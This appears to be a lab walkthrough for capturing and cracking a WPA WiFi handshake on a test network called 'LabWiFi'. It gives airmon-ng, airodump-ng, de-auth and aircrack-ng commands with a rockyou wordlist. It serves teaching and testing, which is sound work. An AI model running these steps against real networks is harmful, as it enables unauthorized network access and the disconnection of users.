
File downloading link : [wifi.zip](https://anir0y-my.sharepoint.com/:u:/g/personal/mail_anir0y_in/EXXoDpgEAVRGn_U9RpSpZvMBhOfntuD7icPBeJoa6JKfaA?e=3NG2q2)

---
## Start with finding networks nearby 

command '`airmon-ng  start wlan0`'

![[Pasted image 20240720192931.png]]


## 2. start scanning network nearby 

`sudo airodump-ng wlan0`

![[Pasted image 20240720193103.png]]

You'll see the information like this, now for this demo we will be using **LabWiFi**

we need few information for our next 2 commands: 

```
BSSID - BC:8A:E8:0C:30:29
Channel - 11 
```

now we will start monitoring all wifi network traffic for this WiFi network and also try to `deauth` users, so we can get the encrypted password packet; refer to EAPOL packet.

### 3.1.a monitoring and writing data

command `sudo airodump-ng -c 11 --bssid BC:8A:E8:0C:30:29 wlan0 -w ~/Desktop/labwifi`

- airodump-ng - program
- `-c` - Channel number 
- `-a` - the BSSID
- `-w` - the file name where we will be writing the data

![[Pasted image 20240720193755.png]]
## 3.2 De-auth attack

All set for a de-auth attack, so when device tries to auto reconnect we can get the hashed password. 

![[Pasted image 20240720194146.png]]

## 3.3 We got the Hash

![[Pasted image 20240720194302.png]]

# 4. verify the data

we will be using **wireshark** and filter the result for `eapol` packets, as we can see here we got the packets that contains the hashed password.

![[Pasted image 20240720194351.png]]

## 5. let's get cracking 

we will be using `aircrack-ng` to brute-force the hash we collected. 

extra steps: 
1. goto dir `cd /usr/share/wordlists`
2. unzip `sudo gzip -d rockyou.txt.gz`

Run the following command 

```bash
aircrack-ng /home/kali/Desktop/labwifi-01.cap -w /usr/share/wordlists/rockyou.txt 
```

- aircrack-ng - the program
- the file location & file name `/home/kali/Desktop/labwifi-01.cap`
- `-w` - the wordlist 

## 5.1 starting brute-force 
![[Pasted image 20240720195128.png]]

## 5.2 cracked 

![[Pasted image 20240720195147.png]]


---
# Troubleshooting 
## 1. device not working

sometimes this happens. just run the following command to fix it: 
`sudo airmon-ng check kill`

![[Pasted image 20240720192756.png]]

Killing the process using our device: 

![[Pasted image 20240720192844.png]]